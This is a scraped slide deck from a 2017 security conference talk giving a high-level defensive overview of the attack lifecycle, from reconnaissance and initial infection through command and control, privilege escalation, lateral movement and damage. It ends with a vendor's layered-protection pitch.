Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Ntxissacsc5 blue 4-the-attack_life_cycle_erich_mueller

ntxissacsc5

  • Login to see the comments

  • Be the first to like this

Ntxissacsc5 blue 4-the-attack_life_cycle_erich_mueller

  1. 1. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 The Attack Lifecycle – Conquering All Stages of an Attack Erich Mueller Solutions Engineer Cybereason November 10, 2017
  2. 2. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Hunting for the Adversary 2 Innovation (Tough!) Custom Development (Challenging) Botnet, Hacked Server, Hosting ($20) Stolen Credit Card ($5) Obfuscator ($0.05) Rebuild Code ($0.00)
  3. 3. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Are you under attack? 3 Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  4. 4. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 External Recon 4 • People/Social Engineering • Conferences • Call help desk or admin • Technology • External scans • Buy information & tools on black market • Business Intelligence • Trusted relationships • 3rd party vendors “Even Rao, a highly experienced cybersecurity researcher, nearly fell for the scam, as he happened to have recently mailed a package via UPS.”
  5. 5. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Initial Infection 5 • Phishing & spear phishing • Vulnerability exploit • Infected USB drive Lateral Movement Recon DamageC & C Initial Infection Privilege EscalationInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  6. 6. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Initial Infection: Process Injection 6 Running a procedure as a thread inside another process • Evasion • Reading host process memory • Affecting host process behavior • Server persistence Lateral Movement Recon DamageC & C Initial Infection Privilege EscalationInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  7. 7. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Initial Infection: Fileless Malware 7 Malicious code launches and carries out an infection within a tool or process • Unlike traditional malware • Doesn’t use a file • Runs in memory of the device Examples of processes/tools • Legitimate Windows processes • Windows management interface • Meterpreter • Executing remote commands Recon DamageC &CInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  8. 8. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Command & Control 8 Why • Establish and maintain connection to: • Execute malicious code • Update malware • Sending back collected info • Provide heartbeat to indicate the attack is still alive How • Legitimate HTTP • Legitimate DNS request • Fast Flux • TOR • IRC • Facebook / Twitter / YouTube comments • Domain Generation AlgorithmPrivilege Escalation Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  9. 9. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Command & Control: Domain Generation Algorithm 9 • C&C servers quickly get blacklisted • DGA generates 1000’s of domains • Predictable to attacker, unpredictable to security researcher • One will be C&C • When C&C domain blacklisted, attacker: • Selects another generated domain • Registers it • Continues attack Spread Damage Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  10. 10. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Privilege Escalation 10 Why • Gain better persistence • Cred dump/user impersonation • Operate under the radar How • Exploit vulnerabilities • Command line vulnerability • Process injection • Leverage improper configurations • Local admin rights for all users • User lockout policies Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  11. 11. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Privilege Escalation: Exploit Windows Vulnerabilities 11 • Windows kernel mode driver vulnerabilities • Windows task scheduler vulnerabilities • Vulnerabilities in Windows design • Windows user account control (UAC) • DLL search order Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  12. 12. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Privilege Escalation: Exploit Windows Vulnerabilities 12 • Windows kernel mode driver vulnerabilities • Windows task scheduler vulnerabilities • Vulnerabilities in Windows design • Windows user account control (UAC) • DLL search order Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  13. 13. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Internal Reconnaissance 13 Why • Paint a picture of the IT infrastructure • Who are the administrators? • What steps get me closer to my target? • What type of services are running? • Identify target and a path to the target How • ARP scanning • NetBIOS enumeration • Port scanning • Credential stealing Initial infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  14. 14. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Recon: Port Scanning 14 • Services use ports to communicate • HTTP = 80, DNS = 53, etc… • Attacker scans the subnet to find exposed and exploitable services Spread DamageC & C DamageInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  15. 15. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Recon: Credential Theft 15 • Mimikatz • Windows Credential Editor • Lazagne Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  16. 16. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Lateral Movement 16 Why • Gain access to target machines • Domain controllers • OWA • Persistence How • Use legitimate tools maliciously • Pass The Hash/Ticket • Shares • PSExec • RDP • SSH • PowerShell • SCCM Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  17. 17. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Lateral Movement: PsExec 17 Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage Legitimate use IT admin runs PsExec to run a process on a remote machine interactively Malicious use Attacker runs PsExec with stolen credential hashes to spread their malware through an entire network
  18. 18. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Lateral Movement: PowerShell 18 Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage Legitimate use IT admin runs PowerShell to monitor firewall Malicious use Attacker PowerShell with encoded commands to spread malware
  19. 19. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Lateral Movement: Pass-the-Ticket 19 Legitimate authentication: Kerberos Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  20. 20. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Lateral Movement: Pass-the-Ticket 20 Malicious use: Pass the Ticket Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  21. 21. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Persistence 21 Why • Establish long term access • Primary goal is often persistent accessibly How • Scheduled tasks • Autoruns • Temp files • Fileless malware Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  22. 22. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Damage 22 Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage • FTP/SSH • Email • DNS • Dropbox • Pastebin o Ransomware o Corporate financials o Credit card data o System corruption Business Profit Sabotage
  23. 23. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Are you under attack? 23 Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  24. 24. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 Total Enterprise PROTECTION 24
  25. 25. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 A Layered Approach to Security 25
  26. 26. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 26 Thank you

×